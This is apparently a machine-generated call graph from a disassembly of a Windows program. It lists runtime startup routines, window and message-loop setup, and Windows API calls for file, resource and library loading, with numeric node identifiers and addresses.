FreeEnvironmentStringsW 104547->104548 104548->104545 104550 f44b4f _wparse_cmdline 104549->104550 104552 f44b8f _wparse_cmdline 104550->104552 104621 f3881d 58 API calls 2 library calls 104550->104621 104552->104483 104554 f44d71 __NMSG_WRITE 104553->104554 104558 f44d69 104553->104558 104555 f387d5 __calloc_crt 58 API calls 104554->104555 104563 f44d9a __NMSG_WRITE 104555->104563 104556 f44df1 104557 f32d55 _free 58 API calls 104556->104557 104557->104558 104558->104487 104559 f387d5 __calloc_crt 58 API calls 104559->104563 104560 f44e16 104562 f32d55 _free 58 API calls 104560->104562 104562->104558 104563->104556 104563->104558 104563->104559 104563->104560 104564 f44e2d 104563->104564 104622 f44607 58 API calls __wfsopen 104563->104622 104623 f38dc6 IsProcessorFeaturePresent 104564->104623 104566 f44e39 104566->104487 104568 f330fb __IsNonwritableInCurrentImage 104567->104568 104646 f3a4d1 104568->104646 104570 f33119 __initterm_e 104571 f32d40 __cinit 67 API calls 104570->104571 104572 f33138 __cinit __IsNonwritableInCurrentImage 104570->104572 104571->104572 104572->104491 104574 f147ea 104573->104574 104584 f14889 104573->104584 104575 f14824 IsThemeActive 104574->104575 104649 f3336c 104575->104649 104579 f14850 104661 f148fd SystemParametersInfoW SystemParametersInfoW 104579->104661 104581 f1485c 104662 f13b3a 104581->104662 104583 f14864 SystemParametersInfoW 104583->104584 104584->104495 104585->104469 104586->104473 104587->104480 104591->104496 104592->104499 104593->104505 104594->104507 104595->104511 104596->104512 104599 f387dc 104597->104599 104600 f38817 104599->104600 104602 f387fa 104599->104602 104606 f451f6 104599->104606 104600->104516 104603 f39de6 TlsSetValue 104600->104603 104602->104599 104602->104600 104614 f3a132 Sleep 104602->104614 104603->104519 104604->104523 104605->104520 104607 f45201 104606->104607 104612 f4521c 104606->104612 104608 f4520d 104607->104608 104607->104612 104615 f38b28 58 API calls __getptd_noexit 104608->104615 104610 f4522c RtlAllocateHeap 104611 f45212 104610->104611 104610->104612 104611->104599 104612->104610 104612->104611 104616 f333a1 DecodePointer 104612->104616 104614->104602 104615->104611 104616->104612 104617->104539 104618->104538 104619->104531 104620->104547 104621->104552 104622->104563 104624 f38dd1 104623->104624 104629 f38c59 104624->104629 104628 f38dec 104628->104566 104630 f38c73 _memset ___raise_securityfailure 104629->104630 104631 f38c93 IsDebuggerPresent 104630->104631 104637 f3a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104631->104637 104633 f38d57 ___raise_securityfailure 104638 f3c5f6 104633->104638 104635 f38d7a 104636 f3a140 GetCurrentProcess TerminateProcess 104635->104636 104636->104628 104637->104633 104639 f3c600 IsProcessorFeaturePresent 104638->104639 104640 f3c5fe 104638->104640 104642 f4590a 104639->104642 104640->104635 104645 f458b9 5 API calls ___raise_securityfailure 104642->104645 104644 f459ed 104644->104635 104645->104644 104647 f3a4d4 EncodePointer 104646->104647 104647->104647 104648 f3a4ee 104647->104648 104648->104570 104650 f39c0b __lock 58 API calls 104649->104650 104651 f33377 DecodePointer EncodePointer 104650->104651 104714 f39d75 LeaveCriticalSection 104651->104714 104653 f14849 104654 f333d4 104653->104654 104655 f333f8 104654->104655 104656 f333de 104654->104656 104655->104579 104656->104655 104715 f38b28 58 API calls __getptd_noexit 104656->104715 104658 f333e8 104716 f38db6 9 API calls __wfsopen 104658->104716 104660 f333f3 104660->104579 104661->104581 104663 f13b47 __ftell_nolock 104662->104663 104664 f17667 59 API calls 104663->104664 104665 f13b51 GetCurrentDirectoryW 104664->104665 104717 f13766 104665->104717 104667 f13b7a IsDebuggerPresent 104668 f4d272 MessageBoxA 104667->104668 104669 f13b88 104667->104669 104672 f4d28c 104668->104672 104670 f13c61 104669->104670 104669->104672 104673 f13ba5 104669->104673 104671 f13c68 SetCurrentDirectoryW 104670->104671 104674 f13c75 Mailbox 104671->104674 104916 f17213 59 API calls Mailbox 104672->104916 104798 f17285 104673->104798 104674->104583 104677 f4d29c 104682 f4d2b2 SetCurrentDirectoryW 104677->104682 104679 f13bc3 GetFullPathNameW 104680 f17bcc 59 API calls 104679->104680 104681 f13bfe 104680->104681 104814 f2092d 104681->104814 104682->104674 104685 f13c1c 104686 f13c26 104685->104686 104917 f6874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104685->104917 104830 f13a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104686->104830 104690 f4d2cf 104690->104686 104692 f4d2e0 104690->104692 104918 f14706 104692->104918 104693 f13c30 104695 f13c43 104693->104695 104697 f1434a 68 API calls 104693->104697 104838 f209d0 104695->104838 104696 f4d2e8 104925 f17de1 104696->104925 104697->104695 104700 f13c4e 104700->104670 104915 f1443a Shell_NotifyIconW _memset 104700->104915 104701 f4d2f5 104703 f4d324 104701->104703 104704 f4d2ff 104701->104704 104705 f17cab 59 API calls 104703->104705 104706 f17cab 59 API calls 104704->104706 104707 f4d320 GetForegroundWindow ShellExecuteW 104705->104707 104708 f4d30a 104706->104708 104711 f4d354 Mailbox 104707->104711 104710 f17b2e 59 API calls 104708->104710 104712 f4d317 104710->104712 104711->104670 104713 f17cab 59 API calls 104712->104713 104713->104707 104714->104653 104715->104658 104716->104660 104718 f17667 59 API calls 104717->104718 104719 f1377c 104718->104719 104929 f13d31 104719->104929 104721 f1379a 104722 f14706 61 API calls 104721->104722 104723 f137ae 104722->104723 104724 f17de1 59 API calls 104723->104724 104725 f137bb 104724->104725 104943 f14ddd 104725->104943 104728 f4d173 105010 f7955b 104728->105010 104729 f137dc Mailbox 104733 f18047 59 API calls 104729->104733 104732 f4d192 104735 f32d55 _free 58 API calls 104732->104735 104736 f137ef 104733->104736 104737 f4d19f 104735->104737 104967 f1928a 104736->104967 104739 f14e4a 84 API calls 104737->104739 104741 f4d1a8 104739->104741 104745 f13ed0 59 API calls 104741->104745 104742 f17de1 59 API calls 104743 f13808 104742->104743 104970 f184c0 104743->104970 104747 f4d1c3 104745->104747 104746 f1381a Mailbox 104748 f17de1 59 API calls 104746->104748 104749 f13ed0 59 API calls 104747->104749 104750 f13840 104748->104750 104751 f4d1df 104749->104751 104752 f184c0 69 API calls 104750->104752 104753 f14706 61 API calls 104751->104753 104755 f1384f Mailbox 104752->104755 104754 f4d204 104753->104754 104756 f13ed0 59 API calls 104754->104756 104758 f17667 59 API calls 104755->104758 104757 f4d210 104756->104757 104759 f18047 59 API calls 104757->104759 104760 f1386d 104758->104760 104761 f4d21e 104759->104761 104974 f13ed0 104760->104974 104763 f13ed0 59 API calls 104761->104763 104765 f4d22d 104763->104765 104771 f18047 59 API calls 104765->104771 104767 f13887 104767->104741 104768 f13891 104767->104768 104769 f32efd _W_store_winword 60 API calls 104768->104769 104770 f1389c 104769->104770 104770->104747 104772 f138a6 104770->104772 104773 f4d24f 104771->104773 104774 f32efd _W_store_winword 60 API calls 104772->104774 104775 f13ed0 59 API calls 104773->104775 104776 f138b1 104774->104776 104777 f4d25c 104775->104777 104776->104751 104778 f138bb 104776->104778 104777->104777 104779 f32efd _W_store_winword 60 API calls 104778->104779 104780 f138c6 104779->104780 104780->104765 104781 f13907 104780->104781 104783 f13ed0 59 API calls 104780->104783 104781->104765 104782 f13914 104781->104782 104990 f192ce 104782->104990 104785 f138ea 104783->104785 104787 f18047 59 API calls 104785->104787 104789 f138f8 104787->104789 104791 f13ed0 59 API calls 104789->104791 104791->104781 104793 f1928a 59 API calls 104795 f1394f 104793->104795 104794 f18ee0 60 API calls 104794->104795 104795->104793 104795->104794 104796 f13ed0 59 API calls 104795->104796 104797 f13995 Mailbox 104795->104797 104796->104795 104797->104667 104799 f17292 __ftell_nolock 104798->104799 104800 f172ab 104799->104800 104801 f4ea22 _memset 104799->104801 105638 f14750 104800->105638 104803 f4ea3e GetOpenFileNameW 104801->104803 104805 f4ea8d 104803->104805 104807 f17bcc 59 API calls 104805->104807 104809 f4eaa2 104807->104809 104809->104809 104811 f172c9 105666 f1686a 104811->105666 104815 f2093a __ftell_nolock 104814->104815 105928 f16d80 104815->105928 104817 f2093f 104818 f13c14 104817->104818 105939 f2119e 89 API calls 104817->105939 104818->104677 104818->104685 104820 f2094c 104820->104818 105940 f23ee7 91 API calls Mailbox 104820->105940 104822 f20955 104822->104818 104823 f20959 GetFullPathNameW 104822->104823 104824 f17bcc 59 API calls 104823->104824 104825 f20985 104824->104825 104826 f17bcc 59 API calls 104825->104826 104827 f20992 104826->104827 104828 f54cab _wcscat 104827->104828 104829 f17bcc 59 API calls 104827->104829 104829->104818 104831 f13ab0 LoadImageW RegisterClassExW 104830->104831 104832 f4d261 104830->104832 105973 f13041 7 API calls 104831->105973 105974 f147a0 LoadImageW EnumResourceNamesW 104832->105974 104835 f4d26a 104836 f13b34 104837 f139d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104836->104837 104837->104693 104839 f54cc3 104838->104839 104849 f209f5 104838->104849 106032 f79e4a 89 API calls 4 library calls 104839->106032 104841 f20ce4 104842 f20cfa 104841->104842 106029 f21070 10 API calls Mailbox 104841->106029 104842->104700 104844 f20ee4 104844->104842 104846 f20ef1 104844->104846 106030 f21093 341 API calls Mailbox 104846->106030 104847 f20a4b PeekMessageW 104914 f20a05 Mailbox 104847->104914 104849->104914 106033 f19e5d 60 API calls 104849->106033 106034 f66349 341 API calls 104849->106034 104850 f20ef8 LockWindowUpdate DestroyWindow GetMessageW 104850->104842 104853 f20f2a 104850->104853 104852 f54e81 Sleep 104852->104914 104855 f55c58 TranslateMessage DispatchMessageW GetMessageW 104853->104855 104855->104855 104856 f55c88 104855->104856 104856->104842 104857 f20e43 PeekMessageW 104857->104914 104858 f20ea5 TranslateMessage DispatchMessageW 104858->104857 104859 f54d50 TranslateAcceleratorW 104859->104857 104859->104914 104860 f19e5d 60 API calls 104860->104914 104861 f20d13 timeGetTime 104861->104914 104862 f5581f WaitForSingleObject 104866 f5583c GetExitCodeProcess CloseHandle 104862->104866 104862->104914 104864 f18047 59 API calls 104864->104914 104865 f17667 59 API calls 104900 f20e70 Mailbox 104865->104900 104898 f20f95 104866->104898 104867 f20e5f Sleep 104867->104900 104868 f30db6 59 API calls Mailbox 104868->104914 104869 f55af8 Sleep 104869->104900 104871 f1b73c 314 API calls 104871->104914 104873 f3049f timeGetTime 104873->104900 104874 f20f4e timeGetTime 106031 f19e5d 60 API calls 104874->106031 104877 f55b8f GetExitCodeProcess 104882 f55ba5 WaitForSingleObject 104877->104882 104883 f55bbb CloseHandle 104877->104883 104880 f95f25 110 API calls 104880->104900 104881 f1b7dd 109 API calls 104881->104900 104882->104883 104882->104914 104883->104900 104885 f55874 104885->104898 104886 f55078 Sleep 104886->104914 104887 f55c17 Sleep 104887->104914 104890 f17de1 59 API calls 104890->104900 104893 f19ea0 314 API calls 104893->104914 104898->104700 104900->104865 104900->104873 104900->104877 104900->104880 104900->104881 104900->104885 104900->104886 104900->104887 104900->104890 104900->104898 104900->104914 106059 f72408 60 API calls 104900->106059 106060 f19e5d 60 API calls 104900->106060 106061 f189b3 69 API calls Mailbox 104900->106061 106062 f1b73c 341 API calls 104900->106062 106063 f664da 60 API calls 104900->106063 106064 f75244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104900->106064 106065 f73c55 66 API calls Mailbox 104900->106065 104901 f184c0 69 API calls 104901->104914 104903 f79e4a 89 API calls 104903->104914 104904 f19c90 59 API calls Mailbox 104904->104914 104905 f6617e 59 API calls Mailbox 104905->104914 104907 f17de1 59 API calls 104907->104914 104908 f189b3 69 API calls 104908->104914 104909 f555d5 VariantClear 104909->104914 104910 f66e8f 59 API calls 104910->104914 104911 f5566b VariantClear 104911->104914 104912 f18cd4 59 API calls Mailbox 104912->104914 104913 f55419 VariantClear 104913->104914 104914->104841 104914->104847 104914->104852 104914->104857 104914->104858 104914->104859 104914->104860 104914->104861 104914->104862 104914->104864 104914->104867 104914->104868 104914->104869 104914->104871 104914->104874 104914->104893 104914->104898 104914->104900 104914->104901 104914->104903 104914->104904 104914->104905 104914->104907 104914->104908 104914->104909 104914->104910 104914->104911 104914->104912 104914->104913 105975 f1e6a0 104914->105975 106006 f1f460 104914->106006 106026 f1e420 341 API calls 104914->106026 106027 f1fce0 341 API calls 2 library calls 104914->106027 106028 f131ce IsDialogMessageW GetClassLongW 104914->106028 106035 f96018 59 API calls 104914->106035 106036 f79a15 59 API calls Mailbox 104914->106036 106037 f6d4f2 59 API calls 104914->106037 106038 f19837 104914->106038 106056 f660ef 59 API calls 2 library calls 104914->106056 106057 f18401 59 API calls 104914->106057 106058 f182df 59 API calls Mailbox 104914->106058 104915->104670 104916->104677 104917->104690 104919 f41940 __ftell_nolock 104918->104919 104920 f14713 GetModuleFileNameW 104919->104920 104921 f17de1 59 API calls 104920->104921 104922 f14739 104921->104922 104923 f14750 60 API calls 104922->104923 104924 f14743 Mailbox 104923->104924 104924->104696 104926 f17df0 __NMSG_WRITE _memmove 104925->104926 104927 f30db6 Mailbox 59 API calls 104926->104927 104928 f17e2e 104927->104928 104928->104701 104930 f13d3e __ftell_nolock 104929->104930 104931 f17bcc 59 API calls 104930->104931 104941 f13ea4 Mailbox 104930->104941 104933 f13d70 104931->104933 104934 f13da6 Mailbox 104933->104934 105051 f179f2 104933->105051 104935 f13e77 104934->104935 104937 f17de1 59 API calls 104934->104937 104934->104941 104942 f179f2 59 API calls 104934->104942 105054 f13f74 104934->105054 104936 f17de1 59 API calls 104935->104936 104935->104941 104938 f13e98 104936->104938 104937->104934 104939 f13f74 59 API calls 104938->104939 104939->104941 104941->104721 104942->104934 105060 f14bb5 104943->105060 104948 f4d8e6 104950 f14e4a 84 API calls 104948->104950 104949 f14e08 LoadLibraryExW 105070 f14b6a 104949->105070 104952 f4d8ed 104950->104952 104955 f14b6a 3 API calls 104952->104955 104957 f4d8f5 104955->104957 104956 f14e2f 104956->104957 104958 f14e3b 104956->104958 105096 f14f0b 104957->105096 104959 f14e4a 84 API calls 104958->104959 104961 f137d4 104959->104961 104961->104728 104961->104729 104964 f4d91c 105104 f14ec7 104964->105104 104966 f4d929 104968 f30db6 Mailbox 59 API calls 104967->104968 104969 f137fb 104968->104969 104969->104742 104973 f184cb 104970->104973 104972 f184f2 104972->104746 104973->104972 105358 f189b3 69 API calls Mailbox 104973->105358 104975 f13ef3 104974->104975 104976 f13eda 104974->104976 104978 f17bcc 59 API calls 104975->104978 104977 f18047 59 API calls 104976->104977 104979 f13879 104977->104979 104978->104979 104980 f32efd 104979->104980 104981 f32f09 104980->104981 104982 f32f7e 104980->104982 104986 f32f2e 104981->104986 105359 f38b28 58 API calls __getptd_noexit 104981->105359 105361 f32f90 60 API calls 3 library calls 104982->105361 104985 f32f8b 104985->104767 104986->104767 104987 f32f15 105360 f38db6 9 API calls __wfsopen 104987->105360 104989 f32f20 104989->104767 104991 f192d6 104990->104991 104992 f30db6 Mailbox 59 API calls 104991->104992 104993 f192e4 104992->104993 104994 f13924 104993->104994 105362 f191fc 59 API calls Mailbox 104993->105362 104996 f19050 104994->104996 105363 f19160 104996->105363 104998 f1905f 104999 f30db6 Mailbox 59 API calls 104998->104999 105000 f13932 104998->105000 104999->105000 105001 f18ee0 105000->105001 105002 f4f17c 105001->105002 105005 f18ef7 105001->105005 105002->105005 105373 f18bdb 59 API calls Mailbox 105002->105373 105004 f18fff 105004->104795 105005->105004 105006 f19040 105005->105006 105007 f18ff8 105005->105007 105372 f19d3c 60 API calls Mailbox 105006->105372 105009 f30db6 Mailbox 59 API calls 105007->105009 105009->105004 105011 f14ee5 85 API calls 105010->105011 105012 f795ca 105011->105012 105374 f79734 105012->105374 105015 f14f0b 74 API calls 105016 f795f7 105015->105016 105017 f14f0b 74 API calls 105016->105017 105018 f79607 105017->105018 105019 f14f0b 74 API calls 105018->105019 105020 f79622 105019->105020 105021 f14f0b 74 API calls 105020->105021 105022 f7963d 105021->105022 105023 f14ee5 85 API calls 105022->105023 105024 f79654 105023->105024 105025 f3571c std::exception::_Copy_str 58 API calls 105024->105025 105026 f7965b 105025->105026 105027 f3571c std::exception::_Copy_str 58 API calls 105026->105027 105028 f79665 105027->105028 105029 f14f0b 74 API calls 105028->105029 105030 f79679 105029->105030 105031 f79109 GetSystemTimeAsFileTime 105030->105031 105032 f7968c 105031->105032 105033 f796b6 105032->105033 105034 f796a1 105032->105034 105036 f796bc 105033->105036 105037 f7971b 105033->105037 105035 f32d55 _free 58 API calls 105034->105035 105038 f796a7 105035->105038 105380 f78b06 116 API calls __fcloseall 105036->105380 105040 f32d55 _free 58 API calls 105037->105040 105041 f32d55 _free 58 API calls 105038->105041 105043 f4d186 105040->105043 105041->105043 105042 f79713 105044 f32d55 _free 58 API calls 105042->105044 105043->104732 105045 f14e4a 105043->105045 105044->105043 105046 f14e54 105045->105046 105048 f14e5b 105045->105048 105381 f353a6 105046->105381 105049 f14e7b FreeLibrary 105048->105049 105050 f14e6a 105048->105050 105049->105050 105050->104732 105052 f17e4f 59 API calls 105051->105052 105053 f179fd 105052->105053 105053->104933 105055 f13f82 105054->105055 105059 f13fa4 _memmove 105054->105059 105057 f30db6 Mailbox 59 API calls 105055->105057 105056 f30db6 Mailbox 59 API calls 105058 f13fb8 105056->105058 105057->105059 105058->104934 105059->105056 105109 f14c03 105060->105109 105063 f14c03 2 API calls 105066 f14bdc 105063->105066 105064 f14bf5 105067 f3525b 105064->105067 105065 f14bec FreeLibrary 105065->105064 105066->105064 105066->105065 105113 f35270 105067->105113 105069 f14dfc 105069->104948 105069->104949 105273 f14c36 105070->105273 105073 f14c36 2 API calls 105076 f14b8f 105073->105076 105074 f14ba1 FreeLibrary 105075 f14baa 105074->105075 105077 f14c70 105075->105077 105076->105074 105076->105075 105078 f30db6 Mailbox 59 API calls 105077->105078 105079 f14c85 105078->105079 105277 f1522e 105079->105277 105081 f14c91 _memmove 105082 f14ccc 105081->105082 105083 f14dc1 105081->105083 105084 f14d89 105081->105084 105085 f14ec7 69 API calls 105082->105085 105291 f7991b 95 API calls 105083->105291 105280 f14e89 CreateStreamOnHGlobal 105084->105280 105093 f14cd5 105085->105093 105088 f14f0b 74 API calls 105088->105093 105089 f14d69 105089->104956 105091 f4d8a7 105092 f14ee5 85 API calls 105091->105092 105094 f4d8bb 105092->105094 105093->105088 105093->105089 105093->105091 105286 f14ee5 105093->105286 105095 f14f0b 74 API calls 105094->105095 105095->105089 105097 f4d9cd 105096->105097 105098 f14f1d 105096->105098 105315 f355e2 105098->105315 105101 f79109 105335 f78f5f 105101->105335 105103 f7911f 105103->104964 105105 f14ed6 105104->105105 105108 f4d990 105104->105108 105340 f35c60 105105->105340 105107 f14ede 105107->104966 105110 f14bd0 105109->105110 105111 f14c0c LoadLibraryA 105109->105111 105110->105063 105110->105066 105111->105110 105112 f14c1d GetProcAddress 105111->105112 105112->105110 105116 f3527c __fcloseall 105113->105116 105114 f3528f 105162 f38b28 58 API calls __getptd_noexit 105114->105162 105116->105114 105118 f352c0 105116->105118 105117 f35294 105163 f38db6 9 API calls __wfsopen 105117->105163 105132 f404e8 105118->105132 105121 f352c5 105122 f352db 105121->105122 105123 f352ce 105121->105123 105124 f35305 105122->105124 105125 f352e5 105122->105125 105164 f38b28 58 API calls __getptd_noexit 105123->105164 105147 f40607 105124->105147 105165 f38b28 58 API calls __getptd_noexit 105125->105165 105129 f3529f __fcloseall @_EH4_CallFilterFunc@8 105129->105069 105133 f404f4 __fcloseall 105132->105133 105134 f39c0b __lock 58 API calls 105133->105134 105145 f40502 105134->105145 105135 f40576 105167 f405fe 105135->105167 105136 f4057d 105172 f3881d 58 API calls 2 library calls 105136->105172 105139 f40584 105139->105135 105173 f39e2b InitializeCriticalSectionAndSpinCount 105139->105173 105140 f405f3 __fcloseall 105140->105121 105142 f39c93 __mtinitlocknum 58 API calls 105142->105145 105144 f405aa EnterCriticalSection 105144->105135 105145->105135 105145->105136 105145->105142 105170 f36c50 59 API calls __lock 105145->105170 105171 f36cba LeaveCriticalSection LeaveCriticalSection _doexit 105145->105171 105156 f40627 __wopenfile 105147->105156 105148 f40641 105178 f38b28 58 API calls __getptd_noexit 105148->105178 105149 f407fc 105149->105148 105153 f4085f 105149->105153 105151 f40646 105179 f38db6 9 API calls __wfsopen 105151->105179 105175 f485a1 105153->105175 105154 f35310 105166 f35332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105154->105166 105156->105148 105156->105149 105180 f337cb 60 API calls 2 library calls 105156->105180 105158 f407f5 105158->105149 105181 f337cb 60 API calls 2 library calls 105158->105181 105160 f40814 105160->105149 105182 f337cb 60 API calls 2 library calls 105160->105182 105162->105117 105163->105129 105164->105129 105165->105129 105166->105129 105174 f39d75 LeaveCriticalSection 105167->105174 105169 f40605 105169->105140 105170->105145 105171->105145 105172->105139 105173->105144 105174->105169 105183 f47d85 105175->105183 105177 f485ba 105177->105154 105178->105151 105179->105154 105180->105158 105181->105160 105182->105149 105186 f47d91 __fcloseall 105183->105186 105184 f47da7 105270 f38b28 58 API calls __getptd_noexit 105184->105270 105186->105184 105188 f47ddd 105186->105188 105187 f47dac 105271 f38db6 9 API calls __wfsopen 105187->105271 105194 f47e4e 105188->105194 105191 f47df9 105272 f47e22 LeaveCriticalSection __unlock_fhandle 105191->105272 105193 f47db6 __fcloseall 105193->105177 105195 f47e6e 105194->105195 105196 f344ea __wsopen_nolock 58 API calls 105195->105196 105200 f47e8a 105196->105200 105197 f47fc1 105198 f38dc6 __invoke_watson 8 API calls 105197->105198 105199 f485a0 105198->105199 105202 f47d85 __wsopen_helper 103 API calls 105199->105202 105200->105197 105201 f47ec4 105200->105201 105208 f47ee7 105200->105208 105203 f38af4 __commit 58 API calls 105201->105203 105204 f485ba 105202->105204 105205 f47ec9 105203->105205 105204->105191 105206 f38b28 __wfsopen 58 API calls 105205->105206 105207 f47ed6 105206->105207 105210 f38db6 __wfsopen 9 API calls 105207->105210 105209 f47fa5 105208->105209 105217 f47f83 105208->105217 105211 f38af4 __commit 58 API calls 105209->105211 105212 f47ee0 105210->105212 105213 f47faa 105211->105213 105212->105191 105214 f38b28 __wfsopen 58 API calls 105213->105214 105215 f47fb7 105214->105215 105216 f38db6 __wfsopen 9 API calls 105215->105216 105216->105197 105218 f3d294 __alloc_osfhnd 61 API calls 105217->105218 105219 f48051 105218->105219 105220 f4807e 105219->105220 105221 f4805b 105219->105221 105222 f47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105220->105222 105223 f38af4 __commit 58 API calls 105221->105223 105232 f480a0 105222->105232 105224 f48060 105223->105224 105226 f38b28 __wfsopen 58 API calls 105224->105226 105225 f4811e GetFileType 105229 f48129 GetLastError 105225->105229 105230 f4816b 105225->105230 105228 f4806a 105226->105228 105227 f480ec GetLastError 105233 f38b07 __dosmaperr 58 API calls 105227->105233 105234 f38b28 __wfsopen 58 API calls 105228->105234 105231 f38b07 __dosmaperr 58 API calls 105229->105231 105240 f3d52a __set_osfhnd 59 API calls 105230->105240 105235 f48150 CloseHandle 105231->105235 105232->105225 105232->105227 105236 f47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105232->105236 105237 f48111 105233->105237 105234->105212 105235->105237 105238 f4815e 105235->105238 105239 f480e1 105236->105239 105242 f38b28 __wfsopen 58 API calls 105237->105242 105241 f38b28 __wfsopen 58 API calls 105238->105241 105239->105225 105239->105227 105244 f48189 105240->105244 105243 f48163 105241->105243 105242->105197 105243->105237 105245 f418c1 __lseeki64_nolock 60 API calls 105244->105245 105259 f48344 105244->105259 105261 f4820a 105244->105261 105246 f481f3 105245->105246 105250 f38af4 __commit 58 API calls 105246->105250 105266 f48212 105246->105266 105247 f48517 CloseHandle 105248 f47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105247->105248 105249 f4853e 105248->105249 105252 f48546 GetLastError 105249->105252 105253 f483ce 105249->105253 105250->105261 105251 f40e5b 70 API calls __read_nolock 105251->105266 105254 f38b07 __dosmaperr 58 API calls 105252->105254 105253->105197 105255 f48552 105254->105255 105257 f3d43d __free_osfhnd 59 API calls 105255->105257 105256 f40add __close_nolock 61 API calls 105256->105266 105257->105253 105258 f497a2 __chsize_nolock 82 API calls 105258->105266 105259->105197 105259->105247 105260 f3d886 __write 78 API calls 105260->105261 105261->105259 105261->105260 105264 f418c1 60 API calls __lseeki64_nolock 105261->105264 105261->105266 105262 f483c1 105265 f40add __close_nolock 61 API calls 105262->105265 105263 f483aa 105263->105259 105264->105261 105268 f483c8 105265->105268 105266->105251 105266->105256 105266->105258 105266->105261 105266->105262 105266->105263 105267 f418c1 60 API calls __lseeki64_nolock 105266->105267 105267->105266 105269 f38b28 __wfsopen 58 API calls 105268->105269 105269->105253 105270->105187 105271->105193 105272->105193 105274 f14b83 105273->105274 105275 f14c3f LoadLibraryA 105273->105275 105274->105073 105274->105076 105275->105274 105276 f14c50 GetProcAddress 105275->105276 105276->105274 105278 f30db6 Mailbox 59 API calls 105277->105278 105279 f15240 105278->105279 105279->105081 105281 f14ea3 FindResourceExW 105280->105281 105282 f14ec0 105280->105282 105281->105282 105283 f4d933 LoadResource 105281->105283 105282->105082 105283->105282 105284 f4d948 SizeofResource 105283->105284 105284->105282 105285 f4d95c LockResource 105284->105285 105285->105282 105287 f14ef4 105286->105287 105288 f4d9ab 105286->105288 105292 f3584d 105287->105292 105290 f14f02 105290->105093 105291->105082 105296 f35859 __fcloseall 105292->105296 105293 f3586b 105305 f38b28 58 API calls __getptd_noexit 105293->105305 105295 f35891 105307 f36c11 105295->105307 105296->105293 105296->105295 105297 f35870 105306 f38db6 9 API calls __wfsopen 105297->105306 105300 f35897 105313 f357be 83 API calls 5 library calls 105300->105313 105302 f358a6 105314 f358c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105302->105314 105304 f3587b __fcloseall 105304->105290 105305->105297 105306->105304 105308 f36c43 EnterCriticalSection 105307->105308 105309 f36c21 105307->105309 105312 f36c39 105308->105312 105309->105308 105310 f36c29 105309->105310 105311 f39c0b __lock 58 API calls 105310->105311 105311->105312 105312->105300 105313->105302 105314->105304 105318 f355fd 105315->105318 105317 f14f2e 105317->105101 105319 f35609 __fcloseall 105318->105319 105320 f3561f _memset 105319->105320 105321 f3564c 105319->105321 105322 f35644 __fcloseall 105319->105322 105331 f38b28 58 API calls __getptd_noexit 105320->105331 105323 f36c11 __lock_file 59 API calls 105321->105323 105322->105317 105324 f35652 105323->105324 105333 f3541d 72 API calls 6 library calls 105324->105333 105327 f35639 105332 f38db6 9 API calls __wfsopen 105327->105332 105328 f35668 105334 f35686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105328->105334 105331->105327 105332->105322 105333->105328 105334->105322 105338 f3520a GetSystemTimeAsFileTime 105335->105338 105337 f78f6e 105337->105103 105339 f35238 __aulldiv 105338->105339 105339->105337 105341 f35c6c __fcloseall 105340->105341 105342 f35c93 105341->105342 105343 f35c7e 105341->105343 105345 f36c11 __lock_file 59 API calls 105342->105345 105354 f38b28 58 API calls __getptd_noexit 105343->105354 105347 f35c99 105345->105347 105346 f35c83 105355 f38db6 9 API calls __wfsopen 105346->105355 105356 f358d0 67 API calls 6 library calls 105347->105356 105350 f35ca4 105357 f35cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105350->105357 105352 f35cb6 105353 f35c8e __fcloseall 105352->105353 105353->105107 105354->105346 105355->105353 105356->105350 105357->105352 105358->104972 105359->104987 105360->104989 105361->104985 105362->104994 105364 f19169 Mailbox 105363->105364 105365 f4f19f 105364->105365 105370 f19173 105364->105370 105366 f30db6 Mailbox 59 API calls 105365->105366 105368 f4f1ab 105366->105368 105367 f1917a 105367->104998 105370->105367 105371 f19c90 59 API calls Mailbox 105370->105371 105371->105370 105372->105004 105373->105005 105377 f79748 __tzset_nolock _wcscmp 105374->105377 105375 f14f0b 74 API calls 105375->105377 105376 f79109 GetSystemTimeAsFileTime 105376->105377 105377->105375 105377->105376 105378 f795dc 105377->105378 105379 f14ee5 85 API calls 105377->105379 105378->105015 105378->105043 105379->105377 105380->105042 105382 f353b2 __fcloseall 105381->105382 105383 f353c6 105382->105383 105384 f353de 105382->105384 105410 f38b28 58 API calls __getptd_noexit 105383->105410 105386 f36c11 __lock_file 59 API calls 105384->105386 105390 f353d6 __fcloseall 105384->105390 105388 f353f0 105386->105388 105387 f353cb 105411 f38db6 9 API calls __wfsopen 105387->105411 105394 f3533a 105388->105394 105390->105048 105395 f35349 105394->105395 105396 f3535d 105394->105396 105456 f38b28 58 API calls __getptd_noexit 105395->105456 105398 f35359 105396->105398 105413 f34a3d 105396->105413 105412 f35415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105398->105412 105400 f3534e 105457 f38db6 9 API calls __wfsopen 105400->105457 105406 f35377 105430 f40a02 105406->105430 105408 f3537d 105408->105398 105409 f32d55 _free 58 API calls 105408->105409 105409->105398 105410->105387 105411->105390 105412->105390 105414 f34a50 105413->105414 105415 f34a74 105413->105415 105414->105415 105416 f346e6 __flswbuf 58 API calls 105414->105416 105419 f40b77 105415->105419 105417 f34a6d 105416->105417 105458 f3d886 105417->105458 105420 f40b84 105419->105420 105422 f35371 105419->105422 105421 f32d55 _free 58 API calls 105420->105421 105420->105422 105421->105422 105423 f346e6 105422->105423 105424 f346f0 105423->105424 105425 f34705 105423->105425 105593 f38b28 58 API calls __getptd_noexit 105424->105593 105425->105406 105427 f346f5 105594 f38db6 9 API calls __wfsopen 105427->105594 105429 f34700 105429->105406 105431 f40a0e __fcloseall 105430->105431 105432 f40a32 105431->105432 105433 f40a1b 105431->105433 105435 f40abd 105432->105435 105437 f40a42 105432->105437 105610 f38af4 58 API calls __getptd_noexit 105433->105610 105615 f38af4 58 API calls __getptd_noexit 105435->105615 105436 f40a20 105611 f38b28 58 API calls __getptd_noexit 105436->105611 105440 f40a60 